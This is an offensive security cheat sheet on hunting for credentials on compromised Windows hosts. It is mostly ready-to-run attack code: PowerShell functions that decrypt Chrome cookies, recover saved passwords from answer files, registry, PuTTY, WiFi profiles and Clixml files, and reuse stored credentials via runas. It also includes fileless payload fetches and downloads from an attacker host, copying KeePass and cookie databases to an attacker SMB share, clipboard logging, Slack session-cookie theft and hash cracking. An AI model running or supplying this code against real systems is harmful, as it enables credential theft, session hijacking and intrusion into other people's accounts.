PRIMARY CATEGORY → CREDENTIAL HUNTING • WINDOWS PRIVESC • WINDOWS CREDENTIALS
Application Configuration Files
e.g. IIS web.config file
Findstr
CMD
for %D in (C:\Users C:\Scripts C:\Temp C:\Windows\Temp) do @findstr /S /I /N /P /C:"password" /C:"passwd" /C:"pwd" /C:"secret" /C:"token" /C:"key" /C:"credential" "%D\*.txt" "%D\*.ini" "%D\*.cfg" "%D\*.config" "%D\*.xml" "%D\*.git" "%D\*.ps1" "%D\*.yml" 2>nul
( the one-liner above is for an interactive cmd.exe prompt; inside a .bat script write %%D instead of %D )
PS
Better choice 😊
Get-ChildItem -Path C:\Users,C:\Scripts,C:\Temp,C:\Windows\Temp -Recurse -File -Include *.txt,*.ini,*.cfg,*.config,*.xml,*.git,*.ps1,*.yml -ErrorAction SilentlyContinue | Select-String -Pattern 'password','passwd','pwd','secret','token','key','credential' -SimpleMatch | Select-Object Path, LineNumber, Line
Unattended Installation Files
e.g. unattend.xml / autounattend.xml files left behind by automated deployments
PS
Get-ChildItem -Path 'C:\' -Recurse -Filter '*.xml' -ErrorAction SilentlyContinue | ? { $_.FullName -match 'unattend\.xml' } | Select -ExpandProperty FullName
unattend.xml
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <AutoLogon>
        <Password>
          <Value>local_4dmin_p@ss</Value>
          <PlainText>true</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <LogonCount>2</LogonCount>
        <Username>Administrator</Username>
      </AutoLogon>
      <ComputerName>*</ComputerName>
    </component>
  </settings>
</unattend>
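Parsing the answer file instead of eyeballing it, as an added example that is not part of the original notes: the function below checks the usual drop locations, pulls every Password / AdministratorPassword element and decodes the non-plaintext form. The decoding rule is an assumption stated in the comments ( Base64 of the UTF-16LE password with the literal string Password, or AdministratorPassword, appended ), the search paths are the common ones, and the sample file written to %TEMP% is constructed for the demo.

```powershell
# Added example, not from the original notes. Assumed encoding when <PlainText>
# is not "true": Base64( UTF-16LE( <password> + "Password" ) ) for AutoLogon and
# LocalAccount passwords, Base64( UTF-16LE( <password> + "AdministratorPassword" ) )
# for UserAccounts/AdministratorPassword. Search locations are the usual suspects.
function Get-UnattendPassword {
    param(
        [string[]]$Path = @(
            'C:\unattend.xml',
            'C:\autounattend.xml',
            'C:\Windows\Panther\Unattend.xml',
            'C:\Windows\Panther\Unattend\Unattend.xml',
            'C:\Windows\System32\Sysprep\sysprep.xml',
            'C:\Windows\System32\Sysprep\Panther\unattend.xml'
        )
    )
    foreach ($file in ($Path | Where-Object { Test-Path -Path $_ })) {
        try { [xml]$doc = Get-Content -Path $file -Raw -ErrorAction Stop } catch { continue }
        # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace
        $xpath = '//*[local-name()="Password" or local-name()="AdministratorPassword"]'
        foreach ($node in $doc.SelectNodes($xpath)) {
            $valueNode = $node.SelectSingleNode('*[local-name()="Value"]')
            if (-not $valueNode -or -not $valueNode.InnerText) { continue }
            $plainNode = $node.SelectSingleNode('*[local-name()="PlainText"]')
            if ($plainNode -and $plainNode.InnerText -eq 'true') {
                $password = $valueNode.InnerText
            } else {
                $suffix   = if ($node.LocalName -eq 'AdministratorPassword') { 'AdministratorPassword' } else { 'Password' }
                $decoded  = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($valueNode.InnerText))
                $password = $decoded -replace ('{0}$' -f $suffix), ''
            }
            $userNode = $node.ParentNode.SelectSingleNode('*[local-name()="Username"]')
            [pscustomobject]@{
                File     = $file
                Element  = '{0}/{1}' -f $node.ParentNode.LocalName, $node.LocalName
                Username = if ($userNode) { $userNode.InnerText } else { $null }
                Password = $password
            }
        }
    }
}

# Constructed demo: an answer file with an obfuscated AutoLogon password, written to %TEMP%
$demo = Join-Path $env:TEMP 'unattend-demo.xml'
$b64  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('local_4dmin_p@ss' + 'Password'))
@"
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>$b64</Value><PlainText>false</PlainText></Password>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"@ | Set-Content -Path $demo -Encoding UTF8

Get-UnattendPassword -Path $demo | Format-List
```

Run it with no arguments on a target to sweep the default locations; a hit whose password is empty but whose file contains a ( Plain ) Value element usually means the deployment tooling scrubbed it, which Windows does itself after setup when the answer file asks for it.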
Powershell History File
Starting with PS 5.0 on Windows 10, the PSReadLine module saves the command history of every interactive console session to the following path
C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Verifying Powershell History Save Path
PS
(Get-PSReadLineOption).HistorySavePath
Reading Powershell History File
Get-Content (Get-PSReadLineOption).HistorySavePath
Reading all existing Powershell History Files
Once we compromise the entire system, we can issue the following command in order to look for sensitive information within the PS history files of every user ( the file only exists for users who ran an interactive console, since ISE does not load PSReadLine )
Get-ChildItem -Path 'C:\Users' -Directory | % { Get-Content (Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt') -ErrorAction SilentlyContinue }
Powershell Credential Objects
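An added example, not part of the original notes, that serves both the history-file sweep above and the credential-objects heading: the first function greps every user's ConsoleHost_history.txt for command shapes that carry a secret on the command line, the second recovers PSCredential / SecureString objects that were saved with Export-Clixml ( the usual way admins park a service password next to a scheduled-task script ). The regex list, the search paths and the demo file written to %TEMP% are assumptions; the history path is the PSReadLine default quoted above.

```powershell
# Added example, not from the original notes. Assumed: regex list, search paths,
# and the constructed .cred file used for the demo.

# Command shapes that routinely embed a secret on the command line
$script:HistoryPatterns = @(
    'ConvertTo-SecureString\s.*-AsPlainText',
    '\bnet(\.exe)?\s+use\b.*\s/user:',
    '\brunas(\.exe)?\b.*\s/user:',
    '\bcmdkey(\.exe)?\s+/(add|generic)',
    '-(Password|Pass|Pwd|Secret|Token|ApiKey|ClientSecret)\s+\S+',
    'PSCredential\s*\(',
    '(Authorization|Bearer)\s*[=:]'
)

function Get-PSHistorySecret {
    param([string]$ProfileRoot = 'C:\Users')
    foreach ($dir in (Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue)) {
        $hist = Join-Path $dir.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
        # absent when the user never opened an interactive console, or when our ACLs do not reach it
        if (-not (Test-Path -Path $hist)) { continue }
        Get-Content -Path $hist -ErrorAction SilentlyContinue |
            Select-String -Pattern $script:HistoryPatterns |
            ForEach-Object {
                [pscustomobject]@{ User = $dir.Name; Line = $_.LineNumber; Command = $_.Line.Trim() }
            }
    }
}

# Export-Clixml protects SecureString/PSCredential with DPAPI in CurrentUser scope, so
# Import-Clixml only yields the clear text when run as the exporting user on the same host
function Get-ClixmlCredential {
    param([string[]]$Path = @($env:USERPROFILE, 'C:\Scripts', 'C:\Temp'))
    Get-ChildItem -Path $Path -Recurse -File -Include '*.xml', '*.clixml', '*.cred' -ErrorAction SilentlyContinue |
        Where-Object { Select-String -Path $_.FullName -Pattern 'PSCredential|<SS\b' -Quiet } |
        ForEach-Object {
            $file = $_.FullName
            try {
                $obj  = Import-Clixml -Path $file -ErrorAction Stop
                $cred = if ($obj -is [pscredential]) { $obj } else { New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList '(securestring)', $obj }
                [pscustomobject]@{ File = $file; User = $cred.UserName; Password = $cred.GetNetworkCredential().Password }
            } catch {
                # "Key not valid for use in specified state" means the blob belongs to another user or host
                [pscustomobject]@{ File = $file; User = $null; Password = "<undecryptable: $($_.Exception.Message)>" }
            }
        }
}

# Constructed demo: export a credential the way a scheduled-task script would
$demo = Join-Path $env:TEMP 'credobj-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$secure = ConvertTo-SecureString -String 'Svc-Backup-2024!' -AsPlainText -Force
New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList 'CORP\svc_backup', $secure |
    Export-Clixml -Path (Join-Path $demo 'backup.cred')

Get-PSHistorySecret            | Format-Table -AutoSize
Get-ClixmlCredential -Path $demo | Format-Table -AutoSize
```

The undecryptable branch is the important one in practice: a .cred file found under another user's profile is worthless until you are running in that user's context ( or hold their DPAPI master key ), exactly as with the browser data further down.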
Windows Sticky Notes
Data stored in a SQLITE Database
Location
C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Information Extraction - Windows
Usage
- Downloading the Powershell Module
From the attacker ⚔️
git clone https://github.com/RamblingCookieMonster/PSSQLite
zip -rv PSSQLite.zip PSSQLite
- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/PSSQLite.zip'
Expand-Archive -Path .\PSSQLite.zip -DestinationPath .
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PSSQLite\PSSQLite\PSSQLite.psd1
- Usage ( copy plum.sqlite somewhere writable first if Sticky Notes is running, as the app keeps the file open )
$db = '<SQLITE_FILE>'
Invoke-SqliteQuery -Database $db -Query 'SELECT Text FROM Note' | ft -Wrap
Information Extraction - UNIX-Like
strings '<SQLITE_FILE>'
Other Interesting Files
PS
Get-ChildItem -Path 'C:\' -Recurse -Include '*.kdbx', '*.vmdk', '*.vhd', '*.vhdx', '*.ppk' -ErrorAction SilentlyContinue | Select -ExpandProperty FullName
Well-known paths worth checking ( most of them need local admin / SYSTEM )
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
Stored Credentials on Windows Credential Manager
Current User Context
Enumeration
Cmdkey
cmdkey.exe /list
( entries of type "Domain Password" whose target reads Domain:interactive=<DOMAIN>\<USER> are the ones runas /savecred reuses; "Generic" entries belong to applications )
Reusing Stored Credentials
Runas
runas.exe /savecred /user:"<DOMAIN>\<USER>" <PROCESS>
e.g.
runas.exe /savecred /user:"DOMAIN.INTERNAL\john.doe" powershell.exe
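Two helpers as an added example ( not part of the original notes ): the first parses cmdkey /list into objects so the reusable entries can be filtered, the second runs a command under a saved credential. runas.exe never hands the child's output back to our console, so the command is wrapped in cmd.exe /c with redirection to a file; that output path, the timeout and the demo user are assumptions.

```powershell
# Added example, not from the original notes. Assumed: output path, timeout, demo user.
function Get-SavedCredential {
    $entries = @(); $cur = $null
    foreach ($line in (cmdkey.exe /list 2>$null)) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            if ($cur) { $entries += [pscustomobject]$cur }
            $cur = [ordered]@{ Target = $Matches[1].Trim(); Type = $null; User = $null }
        } elseif ($cur -and $line -match '^\s*Type:\s*(.+)$') {
            $cur.Type = $Matches[1].Trim()
        } elseif ($cur -and $line -match '^\s*User:\s*(.+)$') {
            $cur.User = $Matches[1].Trim()
        }
    }
    if ($cur) { $entries += [pscustomobject]$cur }
    $entries
}

function Invoke-WithSavedCredential {
    param(
        [Parameter(Mandatory)][string]$User,       # e.g. 'DOMAIN.INTERNAL\john.doe'
        [Parameter(Mandatory)][string]$Command,    # e.g. 'whoami /all'
        [string]$OutFile = 'C:\Windows\Temp\runas-out.txt',   # no spaces: keeps the nested quoting simple
        [int]$TimeoutSec = 20
    )
    # /savecred only reuses interactive ("Domain Password") entries whose target is Domain:interactive=<user>
    $saved = Get-SavedCredential | Where-Object { $_.Target -ieq "Domain:interactive=$User" }
    if (-not $saved) { throw "cmdkey /list shows no saved interactive credential for $User" }

    Remove-Item -Path $OutFile -Force -ErrorAction SilentlyContinue
    $argList = "/savecred /user:$User `"cmd.exe /c $Command > $OutFile 2>&1`""
    $p = Start-Process -FilePath runas.exe -ArgumentList $argList -PassThru -WindowStyle Hidden
    # with the policy "Do not allow storage of passwords and credentials" in force, runas prompts instead of running
    if (-not $p.WaitForExit($TimeoutSec * 1000)) { $p.Kill(); throw 'runas did not return: it is probably waiting for a password' }
    if (Test-Path -Path $OutFile) {
        Get-Content -Path $OutFile
    } else {
        Write-Warning 'no output file: the credential was rejected, or the other user cannot write to that path'
    }
}

Get-SavedCredential | Format-Table -AutoSize
# e.g. Invoke-WithSavedCredential -User 'DOMAIN.INTERNAL\john.doe' -Command 'whoami /all'
```

The output file is written by the other user, so it has to be a location that account can create files in; C:\Windows\Temp works for ordinary domain users by default, a path under our own profile usually does not.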
Browser Credentials
e.g. Cookies, Saved Logins and so on
Chrome
All stored credentials
- Setup
Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpChrome.exe'
Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
New-Item -Type Directory -Path "$env:TEMP\LPE" -Force
cd "$env:TEMP\LPE"
certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/SharpChrome.exe'
- Usage
.\SharpChrome.exe logins /unprotect
Cookie Extraction
Chrome encrypts every cookie value stored in the SQLITE file below with an AES-256-GCM key kept in its "Local State" file ( os_crypt.encrypted_key ), and that key is itself protected with the Windows Data Protection API ( DPAPI ) under the profile owner's user context
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
Therefore, just as for all information protected with this mechanism, in order to decrypt it we must carry out the decryption routine from the session of the user we compromised ( or hold that user's DPAPI master key ); the database is also locked while Chrome is running, so work on a copy
- Setup
Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1'
Copying the Cookie File to the tool's expected location
From the target 🎯
Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Transferring it to the target
Fileless
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/Invoke-SharpChromium.ps1')
- Usage
Invoke-SharpChromium -Command 'cookies <HOST>'
e.g.
Invoke-SharpChromium -Command 'cookies slack.com'
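What SharpChromium automates, done by hand as an added example that is neither the tool's code nor part of the original notes: unwrap the AES key from "Local State" with DPAPI, then AES-GCM-decrypt each encrypted_value. The blob layout assumed here is the Windows one ( "v10" + 12-byte nonce + ciphertext + 16-byte tag, key Base64-encoded behind a 5-byte "DPAPI" marker ); values written by Chrome's newer app-bound encryption ( "v20" prefix ) are reported, not decrypted. It needs PowerShell 7 for the AesGcm class, the PSSQLite module from the Sticky Notes section to read the database, and has to run in the cookie owner's session.

```powershell
# Added example, not from the original notes or SharpChromium. Assumed blob layout:
# "v10" + nonce[12] + ciphertext + tag[16]; key = DPAPI-unwrapped os_crypt.encrypted_key.
if (-not ('System.Security.Cryptography.AesGcm' -as [type])) { throw 'AesGcm needs PowerShell 7+' }

function Get-ChromeMasterKey {
    param([string]$UserData = "$env:LOCALAPPDATA\Google\Chrome\User Data")
    $state   = Get-Content -Path (Join-Path $UserData 'Local State') -Raw | ConvertFrom-Json
    $wrapped = [Convert]::FromBase64String($state.os_crypt.encrypted_key)
    if ([Text.Encoding]::ASCII.GetString($wrapped, 0, 5) -ne 'DPAPI') { throw 'unexpected encrypted_key prefix' }
    [byte[]]$blob = $wrapped[5..($wrapped.Length - 1)]
    # DPAPI unprotect in the current user's context: the step that forces us into the victim's session
    [Security.Cryptography.ProtectedData]::Unprotect($blob, $null, 'CurrentUser')
}

function Unprotect-ChromeValue {
    param([byte[]]$Blob, [byte[]]$Key)
    if (-not $Blob -or $Blob.Length -lt 3) { return '' }
    $prefix = [Text.Encoding]::ASCII.GetString($Blob, 0, 3)
    if ($prefix -eq 'v20') { return '<app-bound encryption, not handled here>' }
    if ($prefix -ne 'v10' -and $prefix -ne 'v11') {
        # profiles from before the AES-GCM scheme: the value itself is a plain DPAPI blob
        return [Text.Encoding]::UTF8.GetString([Security.Cryptography.ProtectedData]::Unprotect($Blob, $null, 'CurrentUser'))
    }
    if ($Blob.Length -le 31) { return '' }            # nonce + tag only, empty plaintext
    [byte[]]$nonce  = $Blob[3..14]
    [byte[]]$cipher = $Blob[15..($Blob.Length - 17)]
    [byte[]]$tag    = $Blob[($Blob.Length - 16)..($Blob.Length - 1)]
    $plain = New-Object byte[] $cipher.Length
    $aes = [Security.Cryptography.AesGcm]::new($Key)
    try { $aes.Decrypt($nonce, $cipher, $tag, $plain) } finally { $aes.Dispose() }   # throws on a wrong key or tampered tag
    [Text.Encoding]::UTF8.GetString($plain)
}

function Get-ChromeCookie {
    param([string]$HostFilter = '', [string]$UserData = "$env:LOCALAPPDATA\Google\Chrome\User Data")
    $key = Get-ChromeMasterKey -UserData $UserData
    # Chrome holds the database open with a lock: query a copy
    $copy = Join-Path $env:TEMP 'Cookies.copy'
    Copy-Item -Path (Join-Path $UserData 'Default\Network\Cookies') -Destination $copy -Force
    $q = "SELECT host_key, name, encrypted_value FROM cookies WHERE host_key LIKE '%$HostFilter%'"
    Invoke-SqliteQuery -DataSource $copy -Query $q | ForEach-Object {
        [pscustomobject]@{
            Host  = $_.host_key
            Name  = $_.name
            Value = Unprotect-ChromeValue -Blob $_.encrypted_value -Key $key
        }
    }
}

# e.g. the Slack session token from the "d" cookie
# Get-ChromeCookie -HostFilter 'slack.com' | Where-Object Name -eq 'd'
```

A GCM tag failure ( "The computed authentication tag did not match" ) on every row means the key does not belong to this profile, typically because Local State was copied from a different user or host than the cookie database.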
Sensitive Information Extraction from Dictionary Files
e.g. Google Chrome Custom Dictionary ( words the user added to the spell checker, which now and then include passwords typed into web forms )
PS
Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Custom Dictionary.txt" | Select-String -Pattern '(passwd|pass|key|token)'
Firefox
Cookie Extraction
Firefox Cookies' Path
%APPDATA%\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite
Unlike [[#Chrome#Cookie Extraction|Chrome]], Firefox does not encrypt the SQLITE database where cookies are stored ( only the saved logins in logins.json are protected, via key4.db ), so we can proceed as follows to retrieve all of them
- Setting up an SMB Server
From the attacker ⚔️
smbserver.py -smb2support -username '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'
From the target 🎯
net use X: "\\<ATTACKER_IP>\<SHARE>" /USER:<USER> <PASSWD>
- Copying Firefox Cookie Database
From the target 🎯
Copy-Item -Path "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite" -Destination 'X:'
- Downloading the Python Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/cookieextractor.py'
- Running the script above
python3 cookieextractor.py --dbpath '<SQLITE_COOKIE_FILE>' --host <HOST>
e.g.
python3 cookieextractor.py --dbpath ./cookies.sqlite --host slack
IM Clients
Instant Messaging
Slack
If the given account is protected by some sort of 2FA, or we simply do not know its credentials, we can try to steal the user's cookies and log in to the cloud-based client with them
This platform sets a cookie named d for every logged-in user; its value is the user's authentication token
So, if we manage to retrieve this cookie through Browser Credential Extraction, we can authenticate as the given user account against this platform
User’s Clipboard
Real-time Monitoring
Setup
- Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/inguardians/Invoke-Clipboard/raw/refs/heads/master/Invoke-Clipboard.ps1'
- Transferring it to the target
Fileless
From the attacker ⚔️
python3 -m http.server 80
From the Target 🎯
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/Invoke-Clipboard.ps1')
Usage ( must run inside the target user's interactive session, since the clipboard belongs to that desktop session )
Invoke-ClipboardLogger
Password Managers
KeepassXC
Enumeration
From the target 🎯
PS
Get-ChildItem -Path 'C:\' -Recurse -Include '*.kdb', '*.kdbx' -ErrorAction SilentlyContinue | Select -ExpandProperty FullName
Transferring the Keepass file to the attacker
From the attacker ⚔️
smbserver.py -smb2support -username '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'
From the target 🎯
net use X: \\<ATTACKER_IP>\<SHARE> /USER:<USER> <PASSWD>
Copy-Item -Path <KEEPASS_FILE> -Destination X: -Force
Extracting a crackable Hash from the Keepass Database File
From the attacker ⚔️
- Downloading the Python Script
curl --silent --location --request GET --remote-name 'https://gist.githubusercontent.com/HarmJ0y/116fa1b559372804877e604d7d367bbc/raw/c0c6f45ad89310e61ec0363a69913e966fe17633/keepass2john.py'
- Installing Python2.7 ( the script is Python 2 only; the John the Ripper jumbo build ships a native keepass2john binary that does the same job )
curl https://pyenv.run | bash
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"
pyenv install 2.7.18
- Creating a Virtual Environment
pyenv shell 2.7.18 && pip install virtualenv
virtualenv .venv
. .venv/bin/activate
- Running the script
python keepass2john.py '<KEEPASS_FILE>' > keepass.hash
( the output line is prefixed with the database name, <NAME>:$keepass$*... , so either strip the prefix or pass --username to hashcat; KDBX 4 databases using the Argon2 KDF are not handled by this script )
Trying to crack the given hash
- John the Ripper
john --wordlist=<WORDLIST> keepass.hash
- Hashcat
hashcat --force -O --attack-mode 0 --hash-type 13400 --username keepass.hash '<WORDLIST>'
Microsoft Exchange Inbox
AD Environment
From the attacker ⚔️ ( a Windows host that can reach the Exchange server with valid domain credentials )
Setup
Downloading the Powershell Script
IEX (New-Object Net.WebClient).DownloadString('https://github.com/dafthack/MailSniper/raw/refs/heads/master/MailSniper.ps1')
Usage
Invoke-GlobalMailSearch ( needs an Exchange admin account, since it grants the ImpersonationAccount the ApplicationImpersonation role and then searches every mailbox through it )
Invoke-GlobalMailSearch -ImpersonationAccount '<USER>' -ExchHostname '<EXCHANGE_SERVER>' -OutputCsv <OUTPUT_FILE>.csv
Current User Mailbox
Invoke-SelfSearch
Invoke-SelfSearch -Mailbox '<USER>@<DOMAIN>'
Credentials on Windows Registry
Windows Autologon Credentials
Workflow
The Windows Autologon Credentials are stored within the following registry key in plain text
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
In order to enable a system autologon, the registry key above must hold the following values
- AutoAdminLogon → Determines whether autologon is enabled or not
1 → Enabled
0 → Disabled
- DefaultUserName → User account that will automatically log on
- DefaultDomainName → Domain of that account ( the hostname for a local one )
- DefaultPassword → Password for the user account specified previously
Important
If it's mandatory to set up Autologon, it's always recommended to use Autologon.exe from SysInternals, which stores the given password as the LSA Secret DefaultPassword instead of in the registry value above ( recoverable only from the LSA secrets, i.e. with SYSTEM rights )
Listing Windows Autologon Credentials
CMD & PS
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
PS
Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select-Object AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword
Putty
Workflow
The settings of a saved PUTTY session are stored in the registry key below; PUTTY never saves the SSH password itself, so what can be recovered is the host name, user name, private key path ( the PublicKeyFile value ) and any proxy user name / password
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
Bear in mind that the keys within the given registry path are tied to the user that configured and saved the session
Therefore, in order to have READ permissions over them, we would need to log in as the principal in question and search for them within HKCU ( HKEY_CURRENT_USER )
Another way would be to search directly under HKEY_USERS\<SID> if we manage to compromise the entire system first
Enumerating existing PUTTY Sessions
CMD & PS
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
PS
Get-ChildItem -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
Listing Credentials tied to the given PUTTY session
CMD & PS
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions\<SESSION>"
PS
Get-ItemProperty -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions\<SESSION>'
WiFi Credentials
It only applies if the target has a Wireless Network Card
Listing saved Wireless Network profiles
Privileged access required ( i.e. System Compromised )
netsh wlan show profiles
Retrieving Saved Wireless Passwords
Pre-shared Key ( Key Content )
netsh wlan show profile name="<WIRELESS_NETWORK_SSID>" key=clear
Command Output
...<SNIP>...
Profile <WIRELESS_NETWORK_SSID> on interface Wi-Fi:
Applied: All User Profile
Security settings
-----------------
Key Content            : ILFREIGHTWIFI-CORP123908!
...<SNIP>...
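One sweep over the three local stores covered in the registry and WiFi sections above, as an added example that is not part of the original notes: Winlogon autologon values, PuTTY sessions for every user whose hive is loaded under HKEY_USERS ( needs admin / SYSTEM; without it only HKCU resolves ), and every saved WLAN profile with its key. The netsh parsing relies on the English output labels "Profile" and "Key Content", which is an assumption: a localized Windows prints different ones.

```powershell
# Added example, not from the original notes.
# Assumed: English netsh labels; PuTTY value names HostName/PortNumber/UserName/PublicKeyFile/ProxyUsername/ProxyPassword.
function Get-AutologonCredential {
    $p = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    [pscustomobject]@{
        Enabled  = ($p.AutoAdminLogon -eq '1')
        Domain   = $p.DefaultDomainName
        User     = $p.DefaultUserName
        # empty although Enabled is true: set with Autologon.exe, so it lives in the LSA secret "DefaultPassword"
        Password = $p.DefaultPassword
    }
}

function Get-PuttySession {
    $roots = @('HKCU:\Software\SimonTatham\PuTTY\Sessions')
    # loaded hives of real users ( S-1-5-21-... ), skipping the *_Classes and well-known SIDs
    $roots += Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
        ForEach-Object { "Registry::HKEY_USERS\$($_.PSChildName)\Software\SimonTatham\PuTTY\Sessions" }
    foreach ($root in $roots) {
        if (-not (Test-Path -Path $root)) { continue }
        $hive = if ($root.StartsWith('HKCU')) { 'HKCU' } else { ($root -split '\\')[1] }
        foreach ($s in (Get-ChildItem -Path $root)) {
            $v = Get-ItemProperty -Path $s.PSPath
            [pscustomobject]@{
                Hive          = $hive
                Session       = [uri]::UnescapeDataString($s.PSChildName)   # PuTTY stores "My Box" as My%20Box
                HostName      = $v.HostName
                Port          = $v.PortNumber
                UserName      = $v.UserName
                PrivateKey    = $v.PublicKeyFile      # despite the name, the path of the .ppk private key
                ProxyUser     = $v.ProxyUsername
                ProxyPassword = $v.ProxyPassword
            }
        }
    }
}

function Get-WlanProfileKey {
    $names = netsh wlan show profiles 2>$null | ForEach-Object {
        if ($_ -match 'Profile\s*:\s*(.+)$') { $Matches[1].Trim() }
    }
    foreach ($name in $names) {
        $detail = netsh wlan show profile name="$name" key=clear 2>$null
        $auth = $detail | Select-String -Pattern 'Authentication\s*:\s*(.+)$' | Select-Object -First 1
        $key  = $detail | Select-String -Pattern 'Key Content\s*:\s*(.+)$'    | Select-Object -First 1
        [pscustomobject]@{
            SSID           = $name
            Authentication = if ($auth) { $auth.Matches[0].Groups[1].Value.Trim() } else { $null }
            Key            = if ($key)  { $key.Matches[0].Groups[1].Value.Trim() }  else { $null }   # open network, or key not disclosed
        }
    }
}

Get-AutologonCredential
Get-PuttySession   | Format-Table -AutoSize
Get-WlanProfileKey | Format-Table -AutoSize
```

Enterprise ( 802.1X ) profiles come back with Authentication set to WPA2-Enterprise and no Key Content: the credentials for those live in the user's Credential Manager or certificate store, not in the profile.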
Automated Enumeration and Extraction
Lazagne
lazagne.exe all
Verbose Output
lazagne.exe all -vv
SessionGopher
Setup
- Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/Arvanaghi/SessionGopher/raw/refs/heads/master/SessionGopher.ps1'
- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/SessionGopher.ps1')
Usage
From the target 🎯
Invoke-SessionGopher -Target (hostname)
Snaffler
It shines by enumerating AD Shares instead of local files
Setup
- Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/SnaffCon/Snaffler/releases/download/1.0.244/Snaffler.exe'
- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
New-Item -Type Directory -Path "$env:TEMP\LPE" -Force
cd "$env:TEMP\LPE"
certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/Snaffler.exe'
Usage
.\Snaffler.exe -s -d '<DOMAIN>' -o '<OUTPUT_FILE>.tsv' -v data -y